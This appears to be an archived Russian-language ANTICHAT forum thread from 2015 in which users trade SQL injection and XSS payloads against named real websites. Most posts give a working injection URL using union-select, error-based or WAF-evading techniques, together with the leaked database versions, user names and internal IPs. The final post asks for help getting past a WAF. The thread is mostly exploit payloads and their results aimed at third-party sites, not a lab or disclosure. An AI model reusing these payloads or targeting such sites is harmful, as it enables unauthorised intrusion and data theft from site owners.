ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
11.05.2015, 00:56
|
|
Guest
Сообщений: n/a
Провел на форуме:
35015
Репутация:
57
|
|
Демонстрация SQLi от меня
|
|
|
|
11.05.2015, 01:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
35015
Репутация:
57
|
|
SQLi на сайте bitbank
|
|
|
|
11.05.2015, 01:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
35015
Репутация:
57
|
|
Сообщение от BabaDook
BabaDook said:
↑
bidderland.co.in/siteadmi
n
Эта уязвимость эксплуатируется за 5 секунд.
нашёл не я , но она очень интересная, не типичная. Кто догнал прошу оставить это в секрете. Да да 5 сек даже много)))
|
|
|
|
11.05.2015, 08:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
943
Репутация:
1
|
|
Внесу и я свои первые 5 копеек
http://www.leong-leong.com/press.ph...,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29 -- |
|
|
|
11.05.2015, 09:15
|
|
Guest
Сообщений: n/a
Провел на форуме:
1704
Репутация:
0
|
|
http://java.lordy.ru/
Есть жаба игра, зарегавшись, в чате можно написать ">alert(XSS)", после этого на java.lordy.ru высветится XSS.
|
|
|
|
11.05.2015, 16:24
|
|
Guest
Сообщений: n/a
Провел на форуме:
56887
Репутация:
28
|
|
Код HTML:
HTML:
http://www.jhewlett.com/content/humor.php?id=10%27+and+1=-0+union+select+user%28%29,group_concat%28database%28%29,0x3a,version%28%29%29+--+
jhewlett_r@209.68.5.201
jhewlett_prod:5.0.96-log
Код HTML:
HTML:
http://nightgallery.ca/event.php?id=91+or+1+group%20by%20concat_ws%280x2a,version%28%29,user%28%29,database%28%29,floor%28rand%280%29*2%29%29%20having%20min%280%29%20or%201--+
5.0.96-log
nightgallery20@72.167.232.44
nightgallery20
Код HTML:
HTML:
http://www.australianpaddlesurfer.com.au/review.php?id=113+or+2+group%20by%20concat_ws%280x2f,version%28%29,user%28%29,database%28%29,floor%28rand%280%29*2%29%29%20having%20min%280%29%20or%201--+
10.0.17-MariaDB-cll-lve
austral3_casso@server-2h-r34.ipv4.au.syr
Код HTML:
HTML:
http://www.novagora.net/rub.php?Rub=0&IDR=5+and+2=0+union+select+1,2,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,4,5+--+
4.0.26-standard-log
novagoraTest
novagoraTest@10.0.5.18 |
|
|
|
11.05.2015, 16:53
|
|
Guest
Сообщений: n/a
Провел на форуме:
51991
Репутация:
2
|
|
|
|
|
|
11.05.2015, 19:44
|
|
Guest
Сообщений: n/a
Провел на форуме:
7357
Репутация:
7
|
|
Код HTML:
HTML:
http://www.oar.org.ro/press.php?id=-1%20union%20all%20select%20null,null,null,version%28%29,null,null%20--
Версия: 5.6.23
User: oarorgro_oar@localhost |
|
|
|
11.05.2015, 19:54
|
|
Guest
Сообщений: n/a
Провел на форуме:
943
Репутация:
1
|
|
|
|
|
|
12.05.2015, 00:54
|
|
Guest
Сообщений: n/a
Провел на форуме:
35015
Репутация:
57
|
|
http://goo.gl/uMgvlO
Код:
Code:
http://www.perio.com.ua/articles.php?id=.13 and @b:=current_user()+/*!50000UNIoN+Select*/+1,concat/*_*/(0x3c7370616e207374796c653d22666f6e742d66616d696c793a4963656c616e643b636f6c6f723a7265643b73697a653a353b746578742d736861646f773a23303030203070782030707820337078223e4d69737465725f42657274306e693c62723e,0x4461746162617365203a3a202020,DATABASE/**_**/(),0x3c62723e506f727420203a3a2020,@@port,0x3c62723e43757272656e745f55736572203a3a202020203a3a ,@b,0x3c62723e56657273696f6e206f66204461746162617365203a3a2020,VERSION(),0xa3c62723e486f73746e616d65203a3a20,0x3c2f7370616e3e,@@HOSTNAME),3,1337,5,6 -- -
Может кто знает как здесь WAF на information_schema обойти?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
